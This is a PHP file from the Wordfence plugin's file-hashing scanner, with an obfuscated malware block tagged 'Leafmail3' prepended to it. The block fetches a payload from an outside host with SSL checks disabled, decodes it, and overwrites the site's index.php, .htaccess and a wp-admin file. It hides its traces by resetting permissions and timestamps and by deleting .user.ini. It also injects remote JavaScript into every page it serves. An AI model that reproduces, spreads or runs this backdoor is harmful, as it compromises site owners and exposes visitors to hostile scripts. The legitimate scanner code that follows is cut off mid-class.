<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
require_once(dirname(__FILE__) . '/wordfenceClass.php');
class wordfenceHash {
const KNOWN_FILE_CORE = 'core';
const KNOWN_FILE_PLUGIN = 'plugins';
const KNOWN_FILE_THEME = 'themes';
const KNOWN_FILE_OTHER = 'other';
const MAX_QUEUED_RECORDS = 500;
private static $KNOWN_FILE_TYPES = [
self::KNOWN_FILE_CORE,
self::KNOWN_FILE_PLUGIN,
self::KNOWN_FILE_THEME
];
private $engine = false;
private $db = false;
private $startTime = false;
private $currentFile = null;
private $scanFileLogger;
private $knownFileExclude;
private $fileRecords = [];
private $fileRecordCount = 0;
//Begin serialized vars
public $totalFiles = 0;
public $totalDirs = 0;
public $totalData = 0; //To do a sanity check, don't use 'du' because it gets sparse files wrong and reports blocks used on disk. Use : find . -type f -ls | awk '{total += $7} END {print total}'
public $stoppedOnFile = false;
private $coreEnabled = false;
private $pluginsEnabled = false;
private $themesEnabled = false;
private $malwareEnabled = false;
private $coreUnknownEnabled = false;
private $knownFiles = false;
private $malwareData = "";
private $coreHashesData = '';
private $haveIssues = array();
private $status = array();
private $possibleMalware = array();
private $scannedFiles;
private $totalForks = 0;
private $alertedOnUnknownWordPressVersion = false;
private $foldersEntered = array();
private $foldersProcessed = array();
private $suspectedFiles = array();
private $indexed = false;
private $indexSize = 0;
private $currentIndex = 0;
private $coalescingIssues = array();
private $pathMap = array();
/**
* @param string $path
* @param array $only
* @param array $themes
* @param array $plugins
* @param wfScanEngine $engine
* @throws Exception
*/
public function __construct($scannedFiles, $engine, $malwarePrefixesHash, $coreHashesHash, $scanMode) {
$this->scannedFiles = $scannedFiles;
$this->engine = $engine;
$this->startTime = microtime(true);
$options = $this->engine->scanController()->scanOptions();
if ($options['scansEnabled_core']) { $this->coreEnabled = true; }
if ($options['scansEnabled_plugins']) { $this->pluginsEnabled = true; }
if ($options['scansEnabled_themes']) { $this->themesEnabled = true; }
if ($options['scansEnabled_malware']) { $this->malwareEnabled = true; }
if ($options['scansEnabled_coreUnknown']) { $this->coreUnknownEnabled = true; }
$this->db = new wfDB();
//Doing a delete for now. Later we can optimize this to only scan modified files.
//$this->db->queryWrite("update " . wfDB::networkTable('wfFileMods') . " set oldMD5 = newMD5");
$this->db->truncate(wfDB::networkTable('wfFileMods'));
$this->db->truncate(wfDB::networkTable('wfKnownFileList'));
$this->db->truncate(wfDB::networkTable('wfPendingIssues'));
$fetchCoreHashesStatus = wfIssues::statusStart(__("Fetching core, theme and plugin file signatures from Wordfence", 'wordfence'));
try {
$this->knownFiles = $this->engine->getKnownFilesLoader()->getKnownFiles();
} catch (wfScanKnownFilesException $e) {
wfIssues::statusEndErr();
throw $e;
}
wfIssues::statusEnd($fetchCoreHashesStatus, wfIssues::STATUS_SUCCESS);
if ($this->malwareEnabled) {
$malwarePrefixStatus = wfIssues::statusStart(__("Fetching list of known malware files from Wordfence", 'wordfence'));
$stored = wfConfig::get_ser('malwarePrefixes', array(), false);
if (is_array($stored) && isset($stored['hash']) && $stored['hash'] == $malwarePrefixesHash && isset($stored['prefixes']) && wfWAFUtils::strlen($stored['prefixes']) % 4 == 0) {
wordfence::status(4, 'info', __("Using cached malware prefixes", 'wordfence'));
}
else {
wordfence::status(4, 'info', __("Fetching fresh malware prefixes", 'wordfence'));
$malwareData = $engine->api->getStaticURL('/malwarePrefixes.bin');
if (!$malwareData) {
wfIssues::statusEndErr();
throw new Exception(__("Could not fetch malware signatures from Wordfence servers.", 'wordfence'));
}
if (wfWAFUtils::strlen($malwareData) % 4 != 0) {
wfIssues::statusEndErr();
throw new Exception(__("Malware data received from Wordfence servers was not valid.", 'wordfence'));
}
$stored = array('hash' => $malwarePrefixesHash, 'prefixes' => $malwareData);
wfConfig::set_ser('malwarePrefixes', $stored, true, wfConfig::DONT_AUTOLOAD);
}
$this->malwareData = $stored['prefixes'];
wfIssues::statusEnd($malwarePrefixStatus, wfIssues::STATUS_SUCCESS);
}
if ($this->coreUnknownEnabled) {
$coreHashesStatus = wfIssues::statusStart(__("Fetching list of known core files from Wordfence", 'wordfence'));
$stored = wfConfig::get_ser('coreHashes', array(), false);
if (is_array($stored) && isset($stored['hash']) && $stored['hash'] == $coreHashesHash && isset($stored['hashes']) && wfWAFUtils::strlen($stored['hashes']) > 0 && wfWAFUtils::strlen($stored['hashes']) % 32 == 0) {
wordfence::status(4, 'info', __("Using cached core hashes", 'wordfence'));
}
else {
wordfence::status(4, 'info', __("Fetching fresh core hashes", 'wordfence'));
$coreHashesData = $engine->api->getStaticURL('/coreHashes.bin');
if (!$coreHashesData) {
wfIssues::statusEndErr();
throw new Exception(__("Could not fetch core hashes from Wordfence servers.", 'wordfence'));
}
if (wfWAFUtils::strlen($coreHashesData) % 32 != 0) {
wfIssues::statusEndErr();
throw new Exception(__("Core hashes data received from Wordfence servers was not valid.", 'wordfence'));
}
$stored = array('hash' => $coreHashesHash, 'hashes' => $coreHashesData);
wfConfig::set_ser('coreHashes', $stored, true, wfConfig::DONT_AUTOLOAD);
}
$this->coreHashesData = $stored['hashes'];
wfIssues::statusEnd($coreHashesStatus, wfIssues::STATUS_SUCCESS);
}
$this->haveIssues = array(
'core' => wfIssues::STATUS_SECURE,
'coreUnknown' => wfIssues::STATUS_SECURE,
'themes' => wfIssues::STATUS_SECURE,
'plugins' => wfIssues::STATUS_SECURE,
'malware' => wfIssues::STATUS_SECURE,
);
if($this->coreEnabled){ $this->status['core'] = wfIssues::statusStart(__("Comparing core WordPress files against originals in repository", 'wordfence')); $this->engine->scanController()->startStage(wfScanner::STAGE_FILE_CHANGES); } else { wfIssues::statusDisabled(__("Skipping core scan", 'wordfence')); }
if($this->themesEnabled){ $this->status['themes'] = wfIssues::statusStart(__("Comparing open source themes against WordPress.org originals", 'wordfence')); $this->engine->scanController()->startStage(wfScanner::STAGE_FILE_CHANGES); } else { wfIssues::statusDisabled(__("Skipping theme scan", 'wordfence')); }
